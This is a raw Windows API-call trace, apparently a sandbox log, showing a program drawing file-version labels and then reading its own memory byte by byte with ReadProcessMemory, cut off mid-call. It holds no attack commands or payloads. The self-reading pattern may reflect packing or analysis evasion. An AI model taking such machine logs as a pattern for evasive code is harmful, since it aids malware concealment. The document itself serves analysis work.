[0328.246] SetBrushOrgEx (in: hdc=0xd0106c6, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0328.247] UnrealizeObject (h=0x1900015) returned 1 [0328.247] SelectObject (hdc=0xd0106c6, h=0x1900015) returned 0x1900011 [0328.247] SetBkMode (hdc=0xd0106c6, mode=1) returned 1 [0328.247] OleTranslateColor () returned 0x0 [0328.247] SetBkColor (hdc=0xd0106c6, color=0xf0f0f0) returned 0xf0f0f0 [0328.247] OleTranslateColor () returned 0x0 [0328.247] SetTextColor (hdc=0xd0106c6, color=0x0) returned 0x0 [0328.247] GetROP2 (hdc=0x130106c8) returned 13 [0328.247] SetROP2 (hdc=0xd0106c6, rop2=13) returned 13 [0328.247] SelectObject (hdc=0x130106c8, h=0x1b00016) returned 0xf3006ab [0328.247] SelectObject (hdc=0x130106c8, h=0x18a002e) returned 0x120a019e [0328.247] SelectObject (hdc=0x130106c8, h=0x1900015) returned 0x1900015 [0328.247] SelectPalette (hdc=0x130106c8, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0328.247] OleTranslateColor () returned 0x0 [0328.247] OleTranslateColor () returned 0x0 [0328.247] UnrealizeObject (h=0xc1006c2) returned 1 [0328.247] OleTranslateColor () returned 0x0 [0328.247] OleTranslateColor () returned 0x0 [0328.247] SetTextColor (hdc=0xd0106c6, color=0x0) returned 0x0 [0328.247] SetBkColor (hdc=0xd0106c6, color=0xf0f0f0) returned 0xf0f0f0 [0328.247] FillRect (hDC=0xd0106c6, lprc=0x18f5cc, hbr=0xc1006c2) returned 1 [0328.247] SetTextColor (hdc=0xd0106c6, color=0x0) returned 0x0 [0328.247] SetBkColor (hdc=0xd0106c6, color=0xf0f0f0) returned 0xf0f0f0 [0328.247] SysStringLen (param_1="Full filename: ") returned 0xf [0328.247] SysStringLen (param_1="Full filename: ") returned 0xf [0328.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x18f5e4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Full filename: ", lpUsedDefaultChar=0x0) returned 15 [0328.247] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="Full filename: ", c=15, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.248] TabbedTextOutA (hdc=0xd0106c6, x=0, y=0, lpString="Full filename: ", chCount=15, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852032 [0328.248] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.248] SysStringLen (param_1="\r\n") returned 0x2 [0328.248] SysStringLen (param_1="\r\n") returned 0x2 [0328.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0328.248] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.248] TabbedTextOutA (hdc=0xd0106c6, x=64, y=0, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0328.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0328.249] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.249] SysStringLen (param_1="File version: ") returned 0xe [0328.249] SysStringLen (param_1="File version: ") returned 0xe [0328.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x18f5e4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File version: \x18", lpUsedDefaultChar=0x0) returned 14 [0328.249] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="File version: \x18", c=14, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.249] TabbedTextOutA (hdc=0xd0106c6, x=0, y=13, lpString="File version: \x18", chCount=14, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852027 [0328.249] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.249] SysStringLen (param_1="\r\n") returned 0x2 [0328.249] SysStringLen (param_1="\r\n") returned 0x2 [0328.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0328.249] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.249] TabbedTextOutA (hdc=0xd0106c6, x=59, y=13, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0328.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0328.249] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.249] SysStringLen (param_1="Product version: ") returned 0x11 [0328.249] SysStringLen (param_1="Product version: ") returned 0x11 [0328.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x18f5e0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Product version: ö\x18", lpUsedDefaultChar=0x0) returned 17 [0328.249] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="Product version: ö\x18", c=17, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.249] TabbedTextOutA (hdc=0xd0106c6, x=0, y=26, lpString="Product version: ö\x18", chCount=17, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852048 [0328.250] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.250] SysStringLen (param_1="\r\n") returned 0x2 [0328.250] SysStringLen (param_1="\r\n") returned 0x2 [0328.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0328.250] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.250] TabbedTextOutA (hdc=0xd0106c6, x=80, y=26, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0328.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0328.250] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.250] SysStringLen (param_1="File flags: ") returned 0xc [0328.250] SysStringLen (param_1="File flags: ") returned 0xc [0328.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x18f5e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File flags: z\x8d\x99rXö\x18", lpUsedDefaultChar=0x0) returned 12 [0328.250] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="File flags: z\x8d\x99rXö\x18", c=12, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.250] TabbedTextOutA (hdc=0xd0106c6, x=0, y=39, lpString="File flags: z\x8d\x99rXö\x18", chCount=12, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852015 [0328.250] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.250] SysStringLen (param_1="\r\n") returned 0x2 [0328.250] SysStringLen (param_1="\r\n") returned 0x2 [0328.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0328.250] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.250] TabbedTextOutA (hdc=0xd0106c6, x=47, y=39, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0328.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0328.250] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.250] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0328.250] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0328.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x18f5e0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File OS: UnknownXö\x18", lpUsedDefaultChar=0x0) returned 16 [0328.251] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="File OS: UnknownXö\x18", c=16, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.251] TabbedTextOutA (hdc=0xd0106c6, x=0, y=52, lpString="File OS: UnknownXö\x18", chCount=16, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852054 [0328.251] InvalidateRect (hWnd=0x10160, lpRect=0x0, bErase=1) returned 1 [0328.251] SysStringLen (param_1="\r\n") returned 0x2 [0328.251] SysStringLen (param_1="\r\n") returned 0x2 [0328.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=t·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0328.251] GetTextExtentPoint32A (in: hdc=0xd0106c6, lpString="\r\n=t·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0328.251] TabbedTextOutA (hdc=0xd0106c6, x=86, y=52, lpString="\r\n=t·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0329.327] LoadLibraryA (lpLibFileName="KERNEL32 ") returned 0x759c0000 [0329.328] SetErrorMode (uMode=0x8001) returned 0x8001 [0329.328] GetProcAddress (hModule=0x759c0000, lpProcName="ReadProcessMemory") returned 0x759ecfcc [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400101, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400102, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400103, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400104, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400105, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400106, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400107, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400108, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400109, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400110, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400111, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400112, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400113, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.328] GetLastError () returned 0x0 [0329.328] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400114, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400115, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400116, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400117, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400118, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400119, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400120, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400121, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400122, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400123, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400124, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400125, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400126, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400127, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400128, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400129, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.329] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.329] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40012f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400130, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400131, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400132, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400133, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400134, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400135, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400136, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400137, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400138, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0329.330] GetLastError () returned 0x0 [0329.330] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400139, lpBuffer=0x18f6b4, nSize=0x4, 